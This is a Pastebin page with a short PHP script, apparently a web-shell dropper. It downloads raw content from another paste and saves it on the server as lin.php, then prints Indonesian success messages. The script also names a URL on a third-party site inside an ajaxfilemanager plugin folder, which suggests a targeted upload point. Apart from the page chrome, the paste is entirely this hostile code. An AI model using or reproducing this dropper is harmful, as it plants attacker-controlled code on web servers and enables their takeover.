Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- $b = <<<END
- http://dimaggio.com/js/tiny_mce_new/plugins/ajaxfilemanager/inc/Picsay.jpg
- END;
- $c = <<<END
- https://pastebin.com/raw/9FLLy960
- END;
- $a = <<<END
- a
- END;
- $aduh = <<<END
- lin.php
- END;
- $asu = file_get_contents($c);
- $data = file_put_contents($aduh,$asu);
- if($asu){
- echo <<<END
- sukses Get konten<br>
- END;
- }
- if($data){
- echo <<<END
- Sukses Put konten<br>
- END;
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment